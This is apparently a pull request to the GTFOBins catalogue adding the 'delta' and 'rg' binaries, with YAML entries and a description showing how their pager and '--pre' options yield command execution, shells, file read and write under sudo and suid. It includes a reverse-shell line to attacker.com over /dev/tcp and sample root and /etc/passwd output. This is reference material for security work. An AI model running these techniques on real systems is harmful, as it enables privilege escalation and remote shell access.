### PR TITLE
Add rg

### DIFF
--- a/_gtfobins/delta
+++ b/_gtfobins/delta
@@ -1,0 +1,38 @@
+---
+functions:
+  command:
+  - code: |-
+      delta --pager '/path/to/command' /dev/null /path/to/input-file
+    contexts:
+      sudo:
+      suid:
+        shell: true
+      unprivileged:
+  file-read:
+  - binary: false
+    code: |-
+      delta --pager cat /dev/null /path/to/input-file
+    comment: |-
+      The file is rendered as a diff against `/dev/null`, so the entire content is displayed as added lines with diff markup on each line.
+    contexts:
+      sudo:
+      suid:
+      unprivileged:
+  file-write:
+  - binary: false
+    code: |-
+      delta --pager 'tee /path/to/output-file' /dev/null /path/to/input-file
+    comment: |-
+      The output includes diff markup on each line.
+    contexts:
+      sudo:
+      suid:
+      unprivileged:
+  reverse-shell:
+  - code: |-
+      delta --pager 'bash -c "exec bash -i &>/dev/tcp/attacker.com/12345 <&1"' /dev/null /path/to/input-file
+    contexts:
+      sudo:
+      unprivileged:
+    listener: tcp-server
+...

--- a/_gtfobins/rg
+++ b/_gtfobins/rg
@@ -1,0 +1,36 @@
+---
+comment: |-
+  The `--pre` option specifies a preprocessor command that is run on every input file. The preprocessor receives the file path as the first argument, and its standard output is used as the input to search. This can be abused to execute arbitrary commands or read files.
+functions:
+  command:
+  - code: |-
+      TF=$(mktemp)
+      echo 'id' > "$TF"
+      chmod +x "$TF"
+      rg --pre "$TF" '' /dev/null
+    comment: |-
+      The command output is shown in the search results. Any command can be written in place of `id`.
+    contexts:
+      sudo:
+      suid:
+        shell: true
+      unprivileged:
+  file-read:
+  - code: |-
+      rg --pre cat '' /path/to/input-file
+    contexts:
+      sudo:
+      suid:
+      unprivileged:
+  shell:
+  - code: |-
+      TF=$(mktemp)
+      printf '#!/bin/sh\n/bin/sh 1>&0' > "$TF"
+      chmod +x "$TF"
+      rg --pre "$TF" '' /dev/null
+    contexts:
+      sudo:
+      suid:
+        shell: true
+      unprivileged:
+...


### PR DESCRIPTION
## New binary: `rg` (ripgrep)

The `--pre` option specifies a preprocessor command that is run on every input file before searching. The preprocessor receives the file path as its first argument, and its stdout is used as the search input. This can be abused to execute arbitrary commands, spawn shells, and read arbitrary files.

### Functions

| Function | Technique |
|----------|-----------|
| `command` | Write a command to a temp script and execute via `--pre` |
| `shell` | Spawn `/bin/sh` via a temp script passed to `--pre` |
| `file-read` | Use `cat` as preprocessor: `rg --pre cat '' /path/to/file` |

### Verification

```bash
# Command execution as current user
$ rg --pre sh '' test.sh
1:uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),...

# Command execution as root via sudo
$ sudo rg --pre sh '' test.sh
1:uid=0(root) gid=0(root) groups=0(root),...

# Arbitrary file read
$ rg --pre cat '' /etc/passwd
1:root:x:0:0:root:/root:/bin/bash
...